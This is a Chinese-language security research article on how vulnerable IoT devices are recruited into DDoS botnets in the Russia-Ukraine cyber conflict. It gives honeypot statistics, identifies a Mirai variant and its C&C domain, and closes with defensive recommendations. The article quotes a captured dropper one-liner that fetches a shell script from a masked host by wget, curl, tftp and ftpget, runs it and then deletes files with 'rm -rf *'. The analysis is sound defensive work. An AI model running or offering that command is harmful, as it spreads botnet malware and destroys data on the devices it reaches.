安全研究 | 如何避免IOT設備成爲網絡武器

導文

在3月11日發佈的俄烏網絡戰攻擊技術分析文章中,我們統計並分析了俄羅斯和烏克蘭之間的網絡戰所使用的技術手段。本文將結合長揚捕獲到的惡意樣本,進行實際結合分析闡述。我們注意到一個問題:誰在爲這場網絡衝突提供肉雞?最不起眼的設備就是網絡戰中的幫兇。

首先讀者需要了解什麼是網絡攻擊最常見的手段。最簡單的理解就是“飢餓營銷”,當網站整點發放商品時,同時幾萬人在線搶購會導致網站崩潰以及用戶無法正常訪問。這個行爲其實已經構成了一種網絡攻擊行爲,在安全領域裡統稱DDOS。

2022 年 3 月 29 日,在烏克蘭全國範圍內,一場大規模的網絡攻擊對國家供應商 Ukrtelecom 造成了嚴重的互聯網中斷。根據全球互聯網監控服務 NetBlock的數據實時網絡數據流量顯示,網絡連接由80%左右下降到13%。

我們再根據俄羅斯和烏克蘭雙方支持組織的攻擊類型進行分類對比發現,參與網絡戰的76個(明確支持一方)組織中,其中有51個支持烏克蘭,25個支持俄羅斯。

烏克蘭支持組織中,使用DDOS攻擊的爲18/51;俄羅斯支持組織中,使用DDOS攻擊的爲7/25。

從數據結果來看,雙方的DDOS手段佔比非常之高。在烏克蘭的官方平臺顯示的30萬人中,很大一部分人員都是採用的DDOS的攻擊形式,而這種攻擊形式只是針對某一個IP或者某一個網站進行,而要想實現文章中開頭出現的國家斷網事件,需要大量的傀儡主機。這種傀儡主機的主要來源主要是通過IOT設備的漏洞開啓Telnet訪問,或者通過弱口令進行SSH遠程訪問種植木馬來實現。我們來看下面兩組數據:

1.自2022年3月26日至4月1日統計的Telnet攻擊數據:

2.自2022年3月26日至4月1日統計的SSH攻擊數據:

從蜜罐中捕獲到的樣本執行腳本中發現,當捕獲到批量掃描器對部署的設備進行攻擊時,會通過多種不同的形式進行下載執行DDOS下載器:

cd /; wget http://x.x.x.x/76d32bXX.sh; curl -O http://x.x.x.x/76d32bXX.sh; chmod 777 76d32bXX.sh; sh 76d32bXX.sh; tftp x.x.x.x -c get 76d32bXX.sh; chmod 777 76d32bXX.sh; sh 76d32bXX.sh; tftp -r 76d32beXX.sh -g x.x.x.x; chmod 777 76d32beXX.sh; sh 76d32beXX.sh; ftpget -v -u anonymous -p anonymous -P 21 x.x.x.x 76d32beXX.sh 76d32beXX.sh; sh 76d32beXX.sh; rm -rf 76d32bXX.sh 76d32bXX.sh 76d32beXX.sh 76d32beXX.sh; rm -rf *

對目標中被種植的惡意下載器進行逆向分析,提取出了大量的惡意DDOS程序,幾乎涵蓋了所有易受攻擊的IOT與路由設備的平臺。

將該樣本通過virustotal進行掃描後,發現是屬於Mirai家族的新變種,C&C控制地址爲jswl.jdaili.xyz。Mirai家族主要利用了IP安全攝像頭、路由器和dvr等設備進行傳播。

隨着國內IOT基礎建設的普及,應積極做好IOT設備的安全防護。IOT設備的固件漏洞修復方式複雜,往往使漏洞不能及時更新補丁,這就會直接導致IOT設備更加容易淪爲DDOS的攻擊傀儡機。

總結

長揚科技安全研究院建議:爲了使IOT設備更加安全,可以採取以下操作來減少IOT設備被惡意入侵的風險。

建議1:禁止向互聯網開放IOT管理權限,同時增強IOT設備管理員密碼的複雜度。

建議2:加強IOT設備的安全建設,可部署入侵防禦系統來進行從流量層面防範針對HTTP和DDOS攻擊。

建議3:加強IOT設備的漏洞管理,官方出現新的補丁時,及時更新安裝,修復漏洞,定時重啓設備。